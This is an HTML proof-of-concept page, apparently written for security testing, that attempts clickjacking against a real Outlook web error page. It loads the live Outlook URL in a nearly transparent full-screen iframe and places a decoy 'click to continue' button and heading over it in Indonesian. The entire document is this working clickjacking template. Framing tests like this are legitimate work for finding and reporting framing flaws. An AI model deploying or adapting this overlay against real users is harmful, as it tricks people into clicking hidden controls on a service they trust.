<!DOCTYPE html>
<html>
  <head>
    <title>Testing Clickjacking pada Outlook Error Page</title>
    <style>
      iframe {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        opacity: 0.1; /* Transparansi untuk menutupi elemen */
        z-index: 2; /* Menempatkan iframe di atas halaman */
      }

      button.fake {
        position: absolute;
        top: 300px;
        left: 50px;
        z-index: 3;
        font-size: 30px;
        padding: 20px;
        background-color: #4CAF50;
        color: white;
        border: none;
        cursor: pointer;
      }

      h2 {
        z-index: 4;
        position: absolute;
        top: 200px;
        left: 50px;
        font-size: 24px;
      }
    </style>
  </head>
  <body>
    <h2>Langkah Selanjutnya</h2>
    <button class="fake">Klik untuk melanjutkan</button>
    <iframe src="https://outlook.live.com/mail/0/olkerror.html/?app=JitExperience&st=500&ru=%2Fmail%2Fmail%2F&et=ServerError&esrc=GlobalException&err=System.Collections.Generic.KeyNotFoundException&ebe=SI2PPF3AAD1F705&cId=58BB10F5D8B04F8EBB1C07753680F5FE&fost=apcprd04&dag=APCPR04DG477&dring=WW&csver=25.7.14.02%2Bb1fda3d21e82c091022da8542bfe40a27d7630fb&efe=SI2PR04CA0017"></iframe>
  </body>
</html>

